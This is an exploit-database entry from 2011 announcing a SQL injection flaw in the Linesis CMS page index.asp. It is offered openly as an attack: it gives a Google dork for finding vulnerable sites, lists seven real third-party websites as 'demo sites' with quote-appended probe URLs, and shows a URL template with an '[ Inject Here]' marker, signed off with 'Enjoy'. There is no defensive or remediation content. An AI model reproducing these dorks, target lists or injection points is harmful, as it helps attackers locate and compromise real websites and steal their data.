Powered by Linesis(index.asp) sql-i Vulnerability

2011-08-11T00:00:00
ID 1337DAY-ID-16659
Type zdt
Reporter Angel Injection
Modified 2011-08-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title:Powered by Linesis(index.asp) sql-i Vulnerability
# Date: 11/8/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc
# Email: Angel-Injection[at]hotmail.com
# Vendor or Software Link: http://www.linesis.com/
# Version:N/A
# Category:: webapps
# Google dork:intext:"Powered by Linesis" inurl:"index.asp?id="
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
demo Sites
1-http://www.guldogan.com/index.asp?ID=152&Lang=EN%27
2-http://kentotel.com.tr/index.asp?ID=152&Lang=EN%27
3-http://www.gulser.com.tr/index.asp?ID=152&Lang=EN%27
4-http://www.devaturizm.com.tr/index.asp?ID=2&Lang=EN%27
5-http://www.eceabroad.com/index.asp?ID=254.355&Lang=EN%27
6-http://www.ahmeteserler.com/index.asp?ID=274&Page=73&Lang=EN%27
7-http://www.fresan.com.tr/index.asp?ID=152&Lang=EN%27


Exploit

http://targets/index.asp?ID=152&Lang=EN'

http://targets/index.asp?id=152&Lang=EN'[ Inject Here]

Enjoy ^_^
-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq And Club Hack Team




#  0day.today [2018-01-02]  #